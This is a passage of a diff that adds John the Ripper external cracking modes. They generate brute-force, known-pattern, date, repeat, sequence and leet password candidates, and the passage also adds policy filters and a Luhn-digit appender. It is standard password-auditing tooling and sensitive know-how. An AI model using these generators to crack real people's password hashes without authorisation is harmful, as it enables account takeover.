+	word[0] = startchar - 1;
+
+	if (req_maxlen)
+		maxlength = req_maxlen;		// --max-len
+	else
+		maxlength = cipher_limit;	// format's limit
+}
+
+void generate()
+{
+	int i;
+
+	if (++word <= endchar)
+		return;
+
+	i = 0;
+
+	while (word[i] > endchar) {
+		word[i++] = startchar;
+		if (!word[i]) {
+			word[i] = startchar;
+			word[i + 1] = 0;
+		} else
+			word[i]++;
+	}
+
+	if (i >= maxlength)
+		word = 0;
+}
+
+/*
+ * This mode will resume correctly without any restore handing.
+ * The empty function just confirms to John that everything is in order.
+ */
+void restore()
+{
+}
+
+# Generic implementation of "dumb" exhaustive search, given a range of lengths
+# and an arbitrary charset.  This is pre-configured to try 8-bit characters
+# against LM hashes, which is only reasonable to do for very short password
+# half lengths.
+[List.External:DumbForce]
+int maxlength;		// Maximum password length to try
+int last;		// Last character position, zero-based
+int lastid;		// Character index in the last position
+int id[0x7f];		// Current character indices for other positions
+int charset[0x100], c0;	// Character set
+
+void init()
+{
+	int minlength;
+	int i, c;
+
+	// Initial password length to try, must be at least 1
+	if (req_minlen)
+		minlength = req_minlen;
+	else
+		minlength = 1;
+	if (req_maxlen)
+		maxlength = req_maxlen;
+	else
+		maxlength = cipher_limit;	// the format's limit
+
+/*
+ * This defines the character set.
+ *
+ * Let's say, we want to try TAB, all non-control ASCII characters, and all
+ * 8-bit characters, including the 8-bit terminal controls range (as these are
+ * used as regular national characters with some 8-bit encodings), but except
+ * for known terminal controls (risky for the terminal we may be running on).
+ *
+ * Also, let's say our hashes are case-insensitive, so skip lowercase letters
+ * (this is right for LM hashes).
+ */
+	i = 0;
+	charset[i++] = 9;		// Add horizontal TAB (ASCII 9), then
+	c = ' ';			// start with space (ASCII 32) and
+	while (c < 'a')			// proceed till lowercase 'a'
+		charset[i++] = c++;
+	c = 'z' + 1;			// Skip lowercase letters and
+	while (c <= 0x7e)		// proceed for all printable ASCII
+		charset[i++] = c++;
+	c++;				// Skip DEL (ASCII 127) and
+	while (c < 0x84)		// proceed over 8-bit codes till IND
+		charset[i++] = c++;
+	charset[i++] = 0x86;		// Skip IND (84 hex) and NEL (85 hex)
+	charset[i++] = 0x87;
+	c = 0x89;			// Skip HTS (88 hex)
+	while (c < 0x8d)		// Proceed till RI (8D hex)
+		charset[i++] = c++;
+	c = 0x91;			// Skip RI, SS2, SS3, DCS
+	while (c < 0x96)		// Proceed till SPA (96 hex)
+		charset[i++] = c++;
+	charset[i++] = 0x99;		// Skip SPA, EPA, SOS
+	c = 0xa0;			// Skip DECID, CSI, ST, OSC, PM, APC
+	while (c <= 0xff)		// Proceed with the rest of 8-bit codes
+		charset[i++] = c++;
+
+/* Zero-terminate it, and cache the first character */
+	charset[i] = 0;
+	c0 = charset[0];
+
+	last = minlength - 1;
+	i = 0;
+	while (i <= last) {
+		id[i] = 0;
+		word[i++] = c0;
+	}
+	lastid = -1;
+	word[i] = 0;
+}
+
+void generate()
+{
+	int i;
+
+/* Handle the typical case specially */
+	if (word[last] = charset[++lastid]) return;
+
+	lastid = 0;
+	word[i = last] = c0;
+	while (i--) {			// Have a preceding position?
+		if (word[i] = charset[++id[i]]) return;
+		id[i] = 0;
+		word[i] = c0;
+	}
+
+	if (++last < maxlength) {	// Next length?
+		id[last] = lastid = 0;
+		word[last] = c0;
+		word[last + 1] = 0;
+	} else				// We're done
+		word = 0;
+}
+
+void restore()
+{
+	int i, c;
+
+/* Calculate the current length and infer the character indices */
+	last = 0;
+	while (c = word[last]) {
+		i = 0; while (charset[i] != c && charset[i]) i++;
+		if (!charset[i]) i = 0;	// Not found
+		id[last++] = i;
+	}
+	lastid = id[--last];
+}
+
+# Generic implementation of exhaustive search for a partially-known password.
+# This is pre-configured for length 8, lowercase and uppercase letters in the
+# first 4 positions (52 different characters), and digits in the remaining 4
+# positions - however, the corresponding part of init() may be modified to use
+# arbitrary character sets or even fixed characters for each position.
+[List.External:KnownForce]
+int last;		// Last character position, zero-based
+int lastofs;		// Last character position offset into charset[]
+int lastid;		// Current character index in the last position
+int id[0x7f];		// Current character indices for other positions
+int charset[0x7f00];	// Character sets, 0x100 elements for each position
+
+void init()
+{
+	int length, maxlength;
+	int pos, ofs, i, c;
+
+	if (req_minlen)
+		length = req_minlen;
+	else
+		length = 8;	// Password length to try (NOTE: other [eg. shorter]
+				// lengths will not be tried!)
+	if (req_maxlen)
+		maxlength = req_maxlen;
+	else
+		maxlength = cipher_limit;	// the format's limit
+
+/* This defines the character sets for different character positions */
+	if (length > maxlength)
+		length = maxlength;
+	pos = 0;
+	while (pos < 4) {
+		ofs = pos++ << 8;
+		i = 0;
+		c = 'a';
+		while (c <= 'z')
+			charset[ofs + i++] = c++;
+		c = 'A';
+		while (c <= 'Z')
+			charset[ofs + i++] = c++;
+		charset[ofs + i] = 0;
+	}
+	while (pos < length) {
+		ofs = pos++ << 8;
+		i = 0;
+		c = '0';
+		while (c <= '9')
+			charset[ofs + i++] = c++;
+		charset[ofs + i] = 0;
+	}
+
+	last = length - 1;
+	pos = -1;
+	while (++pos <= last)
+		word[pos] = charset[id[pos] = pos << 8];
+	lastid = (lastofs = last << 8) - 1;
+	word[pos] = 0;
+}
+
+void generate()
+{
+	int pos;
+
+/* Handle the typical case specially */
+	if (word[last] = charset[++lastid]) return;
+
+	word[pos = last] = charset[lastid = lastofs];
+	while (pos--) {			// Have a preceding position?
+		if (word[pos] = charset[++id[pos]]) return;
+		word[pos] = charset[id[pos] = pos << 8];
+	}
+
+	word = 0;			// We're done
+}
+
+void restore()
+{
+	int i, c;
+
+/* Calculate the current length and infer the character indices */
+	last = 0;
+	while (c = word[last]) {
+		i = lastofs = last << 8;
+		while (charset[i] != c && charset[i]) i++;
+		if (!charset[i]) i = lastofs; // Not found
+		id[last++] = i;
+	}
+	lastid = id[--last];
+}
+
+# A variation of KnownForce configured to try likely date and time strings.
+[List.External:DateTime]
+int last;		// Last character position, zero-based
+int lastofs;		// Last character position offset into charset[]
+int lastid;		// Current character index in the last position
+int id[0x7f];		// Current character indices for other positions
+int charset[0x7f00];	// Character sets, 0x100 elements for each position
+
+void init()
+{
+	int length;
+	int pos, ofs, i, c;
+
+	length = 8;	// Must be one of: 4, 5, 7, 8
+
+/* This defines the character sets for different character positions */
+	pos = 0;
+	while (pos < length - 6) {
+		ofs = pos++ << 8;
+		i = 0;
+		c = '0';
+		while (c <= '9')
+			charset[ofs + i++] = c++;
+		charset[ofs + i] = 0;
+	}
+	if (pos) {
+		ofs = pos++ << 8;
+		charset[ofs] = '/';
+		charset[ofs + 1] = '.';
+		charset[ofs + 2] = ':';
+		charset[ofs + 3] = 0;
+	}
+	while (pos < length - 3) {
+		ofs = pos++ << 8;
+		i = 0;
+		c = '0';
+		while (c <= '9')
+			charset[ofs + i++] = c++;
+		charset[ofs + i] = 0;
+	}
+	ofs = pos++ << 8;
+	charset[ofs] = '/';
+	charset[ofs + 1] = '.';
+	charset[ofs + 2] = ':';
+	charset[ofs + 3] = 0;
+	while (pos < length) {
+		ofs = pos++ << 8;
+		i = 0;
+		c = '0';
+		while (c <= '9')
+			charset[ofs + i++] = c++;
+		charset[ofs + i] = 0;
+	}
+
+	last = length - 1;
+	pos = -1;
+	while (++pos <= last)
+		word[pos] = charset[id[pos] = pos << 8];
+	lastid = (lastofs = last << 8) - 1;
+	word[pos] = 0;
+}
+
+void generate()
+{
+	int pos;
+
+/* Handle the typical case specially */
+	if (word[last] = charset[++lastid]) return;
+
+	word[pos = last] = charset[lastid = lastofs];
+	while (pos--) {			// Have a preceding position?
+		if (word[pos] = charset[++id[pos]]) return;
+		word[pos] = charset[id[pos] = pos << 8];
+	}
+
+	word = 0;			// We're done
+}
+
+void restore()
+{
+	int i, c;
+
+/* Calculate the current length and infer the character indices */
+	last = 0;
+	while (c = word[last]) {
+		i = lastofs = last << 8;
+		while (charset[i] != c && charset[i]) i++;
+		if (!charset[i]) i = lastofs; // Not found
+		id[last++] = i;
+	}
+	lastid = id[--last];
+}
+
+# Try strings of repeated characters.
+#
+# This is the code which is common for all [List.External:Repeats*]
+# sections which include this External_base section.
+# The generate() function will limit the maximum length of generated
+# candidates to either the format's limit (maximum password length)
+# or to the limit specified with --stdout=LENGTH (Default: 125),
+# thus avoiding duplicate candidates for formats with limited maximum
+# passwortd length.
+# The comparison of the current length and the limit is only done
+# after switching to a new length.
+# So, if the minimum length specified already exceeds this limit,
+# then all the candidates for the minimum length will be generated
+# nevertheless.
+[List.External_base:Repeats]
+int minlength, maxlength, minc, maxc, length, c;
+
+void generate()
+{
+	int i;
+
+	i = 0;
+	while (i < length)
+		word[i++] = c;
+	word[i] = 0;
+
+	if (c++ < maxc)
+		return;
+
+	c = minc;
+
+	if (++length > maxlength)
+		c = 0; // Will NUL out the next "word" and thus terminate
+}
+
+# Try strings of repeated characters (range: space - 0xff).
+[List.External:Repeats]
+.include [List.External_base:Repeats]
+void init()
+{
+	if (req_minlen)
+		minlength = req_minlen;
+	else
+		minlength = 1;
+	if (req_maxlen)
+		maxlength = req_maxlen;
+	else
+		maxlength = cipher_limit;	// the format's limit
+	minc = 0x20;
+	maxc = 0xff;
+
+	length = minlength; c = minc;
+}
+
+# Try strings of repeated digits (range: '0' - '9').
+[List.External:Repeats_digits]
+.include [List.External_base:Repeats]
+void init()
+{
+	if (req_minlen)
+		minlength = req_minlen;
+	else
+		minlength = 1;
+	if (req_maxlen)
+		maxlength = req_maxlen;
+	else
+		maxlength = cipher_limit;	// the format's limit
+	minc = '0';
+	maxc = '9';
+
+	length = minlength; c = minc;
+}
+
+# Try strings of repeated lowercase letters (range: 'a' - 'z').
+[List.External:Repeats_lowercase]
+.include [List.External_base:Repeats]
+void init()
+{
+	if (req_minlen)
+		minlength = req_minlen;
+	else
+		minlength = 1;
+	if (req_maxlen)
+		maxlength = req_maxlen;
+	else
+		maxlength = cipher_limit;	// the format's limit
+	minc = 'a';
+	maxc = 'z';
+
+	length = minlength; c = minc;
+}
+
+# Try strings of repeated printable ASCII characters
+# (range: ' ' - '~').
+[List.External:Repeats_printable_ASCII]
+.include [List.External_base:Repeats]
+void init()
+{
+	if (req_minlen)
+		minlength = req_minlen;
+	else
+		minlength = 1;
+	if (req_maxlen)
+		maxlength = req_maxlen;
+	else
+		maxlength = cipher_limit;	// the format's limit
+	minc = ' ';
+	maxc = '~';
+
+	length = minlength; c = minc;
+}
+
+# Try character sequences ("0123456", "acegikmoqs", "ZYXWVU", etc.).
+#
+# The generate() function will limit the maximum length of generated
+# candidates to either the format's limit (maximum password length)
+# or to the limit specified with --stdout=LENGTH (Default: 125),
+# thus avoiding duplicate candidates for formats with limited maximum
+# passwortd length.
+# The comparison of the current length and the limit is only done
+# after switching to a new length.
+# So, if the minimum length specified already exceeds this limit,
+# then all the candidates for the minimum length will be generated
+# nevertheless.
+# External modes reusing this External_base mode should only need to
+# adjust the init() function.
+# In the init() function, a minimum length which is > 1 should be
+# specified.
+# Otherwise, the generated candidates will not depend on the increment
+# specified.
+# For length = 1, the candidates will be the same as for external mode
+# Repeats with length 1.
+# Actually, Repeats is a special case of Sequence, using increment = 0.
+# External modes reusing this External_base mode should also make sure
+# that the number of different characters (specified as a range from "from"
+# to "to") is not smaller than the minimum length ("minlength"),
+# if the start increment "inc" is 1.
+# For a start increment > 1, the number of different characters in the
+# range "from" - "to" must be greater than or equal to
+# (1 + ("minlength" - 1) * "inc").
+# Otherwise you might get unexpected results.
+# The range of characters to be used for the sequences needs to be
+# specified by adjusting the "from" and "to" variables.
+# To generate sequences which decrement characters ("987654"),
+# "from" must be > "to".
+# Otherwise, the generated sequences will increment characters ("abcdef").
+#
+# Variables to be used and the generate() function are common
+# for all sections which include this External_base section.
+[List.External_base:Sequence]
+/*
+ * See the [List.External:Sequence_0-9] section to learn more about
+ * the meaning of these variables which can be adjusted to define
+ * new external modes based on an existing one:
+ */
+int minlength, from, to, maxlength, inc, direction;
+
+/*
+ * The value of these variables shouldn't be changed when copying
+ * an existing external mode:
+ */
+int length, first;
+
+void generate()
+{
+	int i;
+
+	i = 0;
+
+	while (i < length) {
+		word[i] = first + (i * inc * direction);
+		++i;
+	}
+	word[i] = 0;
+
+	// start the next sequence of the same length
+	// with the next character
+	first = first + direction;
+
+	// But check that a sequence of the current length
+	// is still possible (without leaving the range of
+	// characters allowed
+	if ((direction > 0 && first + (length - 1) * inc > to) ||
+	    (direction < 0 && first - (length - 1) * inc < to)) {
+		// No more sequence is possible. Reset start character
+		first = from;
+		// Now try the next length.
+		// But just in case an individual External mode reusing
+		// this External_base mode did specify a maxlength
+		// which is larger than the one supported by the format
+		// or by --stdout=LENGTH, make sure no more candidates
+		// are generated.
+		// Checking this just once per length per increment
+		// doen't really hurt performance.
+		if (maxlength > cipher_limit)
+			maxlength = cipher_limit;
+
+		// For a similar reason, the maximum length of a
+		// sequence is limited by the number of different
+		// characters and by the increment.
+		// The larger the increment, the smaller
+		// the maximum possible length for a given
+		// character range.
+		while (inc  * (maxlength - 1) > direction * (to - from))
+			--maxlength;
+
+		if (++length > maxlength) {
+			// The maximum length for this increment has been reached.
+			// Restart at minimum length with the next possible
+			// increment
+			++inc;
+			// Unfortunately, we have to check again
+			// if the maximum length needs to be reduced
+			// for the new increment
+			while (inc * (maxlength - 1) > direction * (to - from))
+				--maxlength;
+
+			length = minlength;
+		}
+		if (maxlength < minlength)
+			// With the current increment, we can't even generate
+			// sequences of the minimum required length.
+			// So we need to stop here.
+			// This will make sure that no more candidiates
+			//  will be generated:
+			first = 0;
+	}
+}
+
+# Try sequences of digits (range: '0' - '9').
+#
+# Aditional comments can be found in the
+# section [List.External_base:Sequence]
+#
+# This external mode is thoroughly commented,
+# to make it easier to copy and adjust it as needed.
+[List.External:Sequence_0-9]
+.include [List.External_base:Sequence]
+void init()
+{
+	// Adjust the following 4 variables if you want to define
+	// a different external mode.
+
+	// This is the start character for the generated sequence
+	// if "from" is smaller than "to", the increment from
+	// first to second character ... will be positive ("0123456789").
+	// Otherwise, it will be negative ("987654321").
+	from = '0';
+	to = '9';
+
+	// minimum length of the sequence
+	// make sure it is not larger than the number of different characters
+	// in the range between "from" and "to" specified above
+	minlength = 2;
+
+	// start increment for generating the sequence, usually 1
+	// if it is larger than 1, you need even more characters
+	// in the range between "from" and "to"
+	// Don't specify a negative value here.
+	// If you want to generate sequences like "zyxwvu" or "86420",
+	// adjust "from" and "to" so that "from" is larger than "to".
+	// (A start increment of 0 is also possible, in that case the first
+	// sequences will be candidates which just repeat the same character.)
+	inc = 1;
+
+	// For copied external modes, no further changes should be required
+	// in the statements following this comment
+
+	length = minlength;
+	first = from;
+
+	if (from <= to) {
+		maxlength = to - from + 1;
+		direction = 1;
+	} else {
+		// We have to create sequences which decrement the previous character
+		maxlength = from - to + 1;
+		direction = -1;
+	}
+}
+
+# Try sequence of lower case letters (range: 'a' - 'z').
+# This external mode is not very well documented.
+# Refer to [List.External:Sequence_0-9] for more detailed information.
+[List.External:Sequence_a-z]
+.include [List.External_base:Sequence]
+void init()
+{
+	from = 'a';
+	to = 'z';
+	minlength = 2;
+	inc = 1;
+
+	length = minlength;
+	first = from;
+
+	if (from <= to) {
+		maxlength = to - from + 1;
+		direction = 1;
+	} else {
+		maxlength = from - to + 1;
+		direction = -1;
+	}
+}
+
+# Try sequence of lower case letters (range: 'a' - 'z'), but reversed
+# ("zxywvu").
+# This external mode is not very well documented.
+# Refer to [List.External:Sequence_0-9] for more detailed information.
+[List.External:Sequence_z-a]
+.include [List.External_base:Sequence]
+void init()
+{
+	from = 'z';
+	to = 'a';
+	minlength = 2;
+	inc = 1;
+
+	length = minlength;
+	first = from;
+
+	if (from <= to) {
+		maxlength = to - from + 1;
+		direction = 1;
+	} else {
+		maxlength = from - to + 1;
+		direction = -1;
+	}
+}
+
+# Try sequence of printable ASCII characters (range: ' ' - '~').
+# This external mode is not very well documented.
+# Refer to [List.External:Sequence_0-9] for more detailed information.
+[List.External:Sequence_printable_ascii]
+.include [List.External_base:Sequence]
+void init()
+{
+	from = ' ';
+	to = '~';
+	minlength = 2;
+	inc = 1;
+
+	length = minlength;
+	first = from;
+
+	if (from <= to) {
+		maxlength = to - from + 1;
+		direction = 1;
+	} else {
+		maxlength = from - to + 1;
+		direction = -1;
+	}
+}
+
+# Try sequence of printable ASCII characters (range: ' ' - '~'),
+# but decrementing characters ("fedcba") instead of incrementing.
+# This external mode is not very well documented.
+# Refer to [List.External:Sequence_0-9] for more detailed information.
+[List.External:Sequence_reversed_ascii]
+.include [List.External_base:Sequence]
+void init()
+{
+	from = '~';
+	to = ' ';
+	minlength = 2;
+	inc = 1;
+
+	length = minlength;
+	first = from;
+
+	if (from <= to) {
+		maxlength = to - from + 1;
+		direction = 1;
+	} else {
+		maxlength = from - to + 1;
+		direction = -1;
+	}
+}
+
+# Try sequence of characters (range: space - 0xff).
+# This external mode is not very well documented.
+# Refer to [List.External:Sequence_0-9] for more detailed information.
+[List.External:Sequence]
+.include [List.External_base:Sequence]
+void init()
+{
+	from = ' ';
+	to = 0xff;
+	minlength = 2;
+	inc = 1;
+
+	length = minlength;
+	first = from;
+
+	if (from <= to) {
+		maxlength = to - from + 1;
+		direction = 1;
+	} else {
+		maxlength = from - to + 1;
+		direction = -1;
+	}
+}
+
+
+# Generate candidate passwords from many small subsets of characters from a
+# much larger full character set.  This will test for passwords containing too
+# few different characters.  As currently implemented, this code will produce
+# some duplicates, although their number is relatively small when the maximum
+# number of different characters (the maxdiff setting) is significantly lower
+# than the maximum length (the maxlength setting).  Nevertheless, you may want
+# to pass the resulting candidate passwords through "unique" if you intend to
+# test them against hashes that are salted and/or of a slow to compute type.
+[List.External:Subsets]
+int minlength;		// Minimum password length to try
+int maxlength;		// Maximum password length to try
+int startdiff;		// Initial number of characters in a subset to try
+int maxdiff;		// Maximum number of characters in a subset to try
+int last;		// Last character position, zero-based
+int lastid;		// Character index in the last position
+int id[0x7f];		// Current character indices for other positions
+int subset[0x100], c0;	// Current subset
+int subcount;		// Number of characters in the current subset
+int subid[0x100];	// Indices into charset[] of characters in subset[]
+int charset[0x100];	// Full character set
+int charcount;		// Number of characters in the full charset
+
+void init()
+{
+	int i, c;
+
+	// Minimum password length to try, must be at least 1
+	if (req_minlen)
+		minlength = req_minlen;
+	else
+		minlength = 1;
+
+	// Maximum password length to try, must be at least same as minlength
+	// This external mode's default maximum length can be adjusted
+	// using --max-length= on the command line
+	if (req_maxlen)
+		maxlength = req_maxlen;
+	else
+		maxlength = 8;
+
+	// "cipher_limit" is the variable which contains the format's
+	// maximum password length
+	if (maxlength > cipher_limit)
+		maxlength = cipher_limit;
+
+	startdiff = 1;	// Initial number of different characters to try
+	maxdiff = 3;	// Maximum number of different characters to try
+
+/* This defines the character set */
+	i = 0;
+	c = 0x20;
+	while (c <= 0x7e)
+		charset[i++] = c++;
+
+	if (maxdiff > (charcount = i))
+		maxdiff = i;
+	if (maxdiff > maxlength)
+		maxdiff = maxlength;
+
+/*
+ * Initialize the variables such that generate() gets to its "next subset"
+ * code, which will initialize everything for real.
+ */
+	subcount = (i = startdiff) - 1;
+	while (i--)
+		subid[i] = charcount;
+	subset[0] = c0 = 0;
+	last = maxlength - 1;
+	lastid = -1;
+}
+
+void generate()
+{
+	int i;
+
+/* Handle the typical case specially */
+	if (word[last] = subset[++lastid]) return;
+
+	lastid = 0;
+	word[i = last] = c0;
+	while (i--) {			// Have a preceding position?
+		if (word[i] = subset[++id[i]]) return;
+		id[i] = 0;
+		word[i] = c0;
+	}
+
+	if (++last < maxlength) {	// Next length?
+		id[last] = lastid = 0;
+		word[last] = c0;
+		word[last + 1] = 0;
+		return;
+	}
+
+/* Next subset */
+	if (subcount) {
+		int j;
+		i = subcount - 1;
+		j = charcount;
+		while (++subid[i] >= j) {
+			if (i--) {
+				j--;
+				continue;
+			}
+			subid[i = 0] = 0;
+			subset[++subcount] = 0;
+			break;
+		}
+	} else {
+		subid[i = 0] = 0;
+		subset[++subcount] = 0;
+	}
+	subset[i] = charset[subid[i]];
+	while (++i < subcount)
+		subset[i] = charset[subid[i] = subid[i - 1] + 1];
+
+	if (subcount > maxdiff) {
+		word = 0;		// Done
+		return;
+	}
+
+/*
+ * We won't be able to fully use the subset if the length is smaller than the
+ * character count.  We assume that we've tried all smaller subsets before, so
+ * we don't bother with such short lengths.
+ */
+	if (minlength < subcount)
+		last = subcount - 1;
+	else
+		last = minlength - 1;
+	c0 = subset[0];
+	i = 0;
+	while (i <= last) {
+		id[i] = 0;
+		word[i++] = c0;
+	}
+	lastid = 0;
+	word[i] = 0;
+}
+
+# Simple password policy matching: require at least one digit.
+[List.External:AtLeast1-Simple]
+void filter()
+{
+	int i, c;
+
+	i = 0;
+	while (c = word[i++])
+		if (c >= '0' && c <= '9')
+			return; // Found at least one suitable character, good
+
+	word = 0; // No suitable characters found, skip this "word"
+}
+
+# The same password policy implemented in a more efficient and more generic
+# fashion (easy to expand to include other "sufficient" characters as well).
+[List.External:AtLeast1-Generic]
+int mask[0x100];
+
+void init()
+{
+	int c;
+
+	mask[0] = 0; // Terminate the loop in filter() on NUL
+	c = 1;
+	while (c < 0x100)
+		mask[c++] = 1; // Continue looping in filter() on most chars
+
+	c = '0';
+	while (c <= '9')
+		mask[c++] = 0; // Terminate the loop in filter() on digits
+}
+
+void filter()
+{
+	int i;
+
+	i = -1;
+	while (mask[word[++i]])
+		continue;
+	if (word[i])
+		return; // Found at least one suitable character, good
+
+	word = 0; // No suitable characters found, skip this "word"
+}
+
+# An efficient and fairly generic password policy matcher.  The policy to match
+# is specified in the check at the end of filter() and in mask[].  For example,
+# lowercase and uppercase letters may be treated the same by initializing the
+# corresponding mask[] elements to the same value, then adjusting the value to
+# check "seen" for accordingly.
+[List.External:Policy]
+int mask[0x100];
+
+void init()
+{
+	int c;
+
+	mask[0] = 0x100;
+	c = 1;
+	while (c < 0x100)
+		mask[c++] = 0x200;
+
+	c = 'a';
+	while (c <= 'z')
+		mask[c++] = 1;
+	c = 'A';
+	while (c <= 'Z')
+		mask[c++] = 2;
+	c = '0';
+	while (c <= '9')
+		mask[c++] = 4;
+}
+
+void filter()
+{
+	int i, seen;
+
+/*
+ * This loop ends when we see NUL (sets 0x100) or a disallowed character
+ * (sets 0x200).
+ */
+	i = -1; seen = 0;
+	while ((seen |= mask[word[++i]]) < 0x100)
+		continue;
+
+/*
+ * We should have seen at least one character of each type (which "add up"
+ * to 7) and then a NUL (adds 0x100), but not any other characters (would
+ * add 0x200).  The length must be 8.
+ */
+	if (seen != 0x107 || i != 8)
+		word = 0; // Does not conform to policy
+}
+
+# Append the Luhn algorithm digit to arbitrary all-digit strings.  Optimized
+# for speed, not for size nor simplicity.  The primary optimization trick is to
+# compute the length and four sums in parallel (in two SIMD'ish variables).
+# Then whether the length is even or odd determines which two of the four sums
+# are actually used.  Checks for non-digits and for NUL are packed into the
+# SIMD'ish bitmasks as well.
+[List.External:AppendLuhn]
+int map1[0x100], map2[0x1fff];
+
+void init()
+{
+	int i;
+
+	map1[0] = ~0x7fffffff;
+	i = 1;
+	while (i < 0x100)
+		map1[i++] = ~0x7effffff;
+	i = -1;
+	while (++i < 10)
+		map1['0' + i] = i + ((i * 2 % 10 + i / 5) << 12);
+	i = -1;
+	while (++i < 0x1fff) {
+		if (i % 10)
+			map2[i] = '9' + 1 - i % 10;
+		else
+			map2[i] = '0';
+	}
+}
+
+void filter()
+{
+	int i, o, e;
+
+	i = o = e = 0;
+	while ((o += map1[word[i++]]) >= 0) {
+		if ((e += map1[word[i++]]) >= 0)
+			continue;
+		if (e & 0x01000000)
+			return; // Not all-digit, leave unmodified
+		word[i--] = 0;
+		word[i] = map2[(e & 0xfff) + (o >> 12)];
+		return;
+	}
+	if (o & 0x01000000)
+		return; // Not all-digit, leave unmodified
+	word[i--] = 0;
+	word[i] = map2[(o & 0xfff) + (e >> 12)];
+}
+
+# Trivial Rotate function, which rotates letters in a word
+# by a given number of places (like 13 in case of ROT13).
+# Words which don't contain any letters (and thus wouldn't be changed
+# by this filter) are skipped, because these unchanged words probably
+# should have been tried before trying a mangled version.
+[List.External_base:Filter_Rotate]
+
+int rot; // The number of places to rotate each letter in a word
+
+void filter()
+{
+	int i, j, c;
+
+	i = 0;
+	j = 0; // j counts the number of changed characters
+
+	while (c = word[i]) {
+		if (c >= 'a' && c <= 'z') {
+			c = c - 26 + rot;
+			if (c < 'a') c += 26;
+			word[i] = c;
+			j++;
+		} else if (c >= 'A' && c <= 'Z' ) {
+			c = c - 26 + rot;
+			if (c < 'A') c += 26;
+			word[i] = c;
+			j++;
+		}
+		i++;
+	}
+	if (j == 0)
+		// Nothing changed. Reject this word.
+		word = 0;
+}
+
+# ROT13 Example
+[List.External:Filter_ROT13]
+.include [List.External_base:Filter_Rotate]
+void init()
+{
+	// Just in case someone wants to "rotate" by other values,
+	// adjust the value of the rot variable
+	// (may be in a copied external mode):
+	// 	13: "abcABCxyzXYZ" -> "nopNOPklmKLM"
+	// 	 1: "abcABCxyzXYZ" -> "bcdBCDyzaYZA"
+	// 	25: "abcABCxyzXYZ" -> "zabZABwxyWXY"
+	// 	-1: "abcABCxyzXYZ" -> "zabZABwxyWXY"
+	// and so on
+	// Allowed range: -25 <= rot <= -1, or 1 <= rot <= 25
+	rot = 13;
+
+	// Don't change the following statement.
+	// It is supposed to "sanitize" the value to be in the
+	// range
+	rot = (rot + 26) % 26;
+}
+
+# Trivial parallel processing example (obsoleted by the "--node" option)
+[List.External:Parallel]
+/*
+ * This word filter makes John process some of the words only, for running
+ * multiple instances on different CPUs.  It can be used with any cracking
+ * mode except for "single crack".  Note: this is not a good solution, but
+ * is just an example of what can be done with word filters.
+ */
+
+int node, total;			// This node's number, and node count
+int number;				// Current word number
+
+void init()
+{
+	node = 1; total = 2;		// Node 1 of 2, change as appropriate
+	number = node - 1;		// Speedup the filter a bit
+}
+
+void filter()
+{
+	if (number++ % total)		// Word for a different node?
+		word = 0;		// Yes, skip it
+}
+
+# Interrupt the cracking session after "max" words tried
+[List.External:AutoAbort]
+int max;				// Maximum number of words to try
+int number;				// Current word number
+
+void init()
+{
+	max = 1000;
+	number = 0;
+}
+
+void filter()
+{
+	if (++number > max)
+		abort = 1;		// Interrupt the cracking session
+}
+
+# Print the status line after every "interval" words tried
+[List.External:AutoStatus]
+int interval;				// How often to print the status
+int number;				// Current word number
+
+void init()
+{
+	interval = 1000;
+	number = 0;
+}
+
+void filter()
+{
+	if (number++ % interval)
+		return;
+	status = 1;			// Print the status line
+}
+
+#
+# Reference example hybrid-mode external. same as jtr-rule: $[0-9]$[0-9]
+# this format is to be used similar to a filter, in that it requires some
+# other word generator (markov, wordlist, etc).  However, this type external
+# will get new() called with each word, and then have next() called, until
+# the word[0]=0 is seen (meaning all candidates for the base word have been
+# generated.  Prior to new() or restore(), word[] is the 'base' word.
+# if the script is able to properly resume, then it should set the global
+# variable hybrid_total to the count of candidates that will be generated
+# for this word (in new() / restore(), then in the body of restore() there
+# is a global variable set 'hybrid_resume' that was the prior number of
+# canidates generated for this base-word.  Resume should start at the NEXT
+# If the script is not able to easily resume, then simply do NOT set the
+# global hybrid_total to anything either function.  JtR will 'still' resume
+# propery, but it will do so by calling new()/next()/next().../next() until
+# back to the proper resume location.
+#
+# script changed to append a _ character before the number, each time within
+# the next() function. Done this way to better validate that -restore within
+# jtr is working properly.
+#
+[List.External:Hybrid_example]
+/* static vars for the script */
+int cnt, length, total;
+
+void init()
+{
+	/* in this simple example, we always generate 100 candidates per word */
+	total = 100;/* this is a VERY simple example */
+}
+
+/* new word */
+void new()
+{
+	/* get the word length) */
+	length = 0; while (word[length++]) ; --length;
+
+	/*
+	 * If this was a more complex script, we would compute total candidates
+	 * at this location, if we can. If we can not compute total candidates
+	 * then it is likely we can not resume 'easily', so if that is the
+	 * case, we would simply set hybrid_total to -1, or do nothing, since
+	 * do_external_hybrid_crack() sets it to -1 before calling this function.
+	 */
+	 hybrid_total = total;
+
+	/* Reset or counter for THIS word. */
+	cnt = 0;
+
+	/*
+	 * word will be too long to be used, or too short to be used. If so
+	 * then set hybrid_total to 0 and this entire word will be skipped.
+	 */
+	if (req_minlen > length - 2 || (req_maxlen && req_maxlen < length + 2))
+		hybrid_total = 0;
+}
+
+void next()
+{
+	/* in this simple script, if cnt is 100, this word is DONE */
+	if (cnt == 100) {
+		word[0] = 0;
+		return;
+	}
+
+	/* set word[] to the next candidate */
+	word[length++] = '_';
+	word[length  ] = '0' + cnt / 10;
+	word[length+1] = '0' + cnt % 10;
+	word[length+2] = 0;
+	++cnt;
+}
+
+/* Called when restoring an interrupted session */
+void restore()
+{
+	int i;
+
+	length = 0; while (word[length++]) ; --length;
+
+	/* for this simple script, simply setting cnt resumes */
+	cnt = hybrid_resume + 1; if (cnt > 100) cnt=100;
+	i = 0;
+	while (i++ < cnt) word[length++] = '_';
+	word[length] = 0;
+
+	/* tell john that we have properly 'resumed', by setting a 'proper' total */
+	hybrid_total = total;
+}
+
+# External hybrid 'leet code
+[List.External:Leet]
+/*
+ * 1337 language in this script:
+ *   a -> a4@
+ *   b -> b8
+ *   e -> e3
+ *   g -> g9
+ *   i -> i1!
+ *   l -> l1
+ *   o -> o0
+ *   s -> s$5
+ *   t -> t7
+ */
+
+int rotor[626]; /* max length input is 125 bytes [125*5+1]; */
+int rotors[125];
+int rotor_ptr[125];
+int rotor_idx[125];
+int rotor_cnt[125];
+int current_word_count;
+int max_mangle; /* controls how many bytes we run through our 'leet' code */
+int max_mangle_letters;
+int original_word; /* if set to 1 then we start with original word. If 0, then start with first mangled word */
+
+void init()
+{
+	/* note, 3^10 is 59k so aaaaaaaaaa will produce that many words! */
+	max_mangle_letters = 10; /* only mangle 10 characters max */
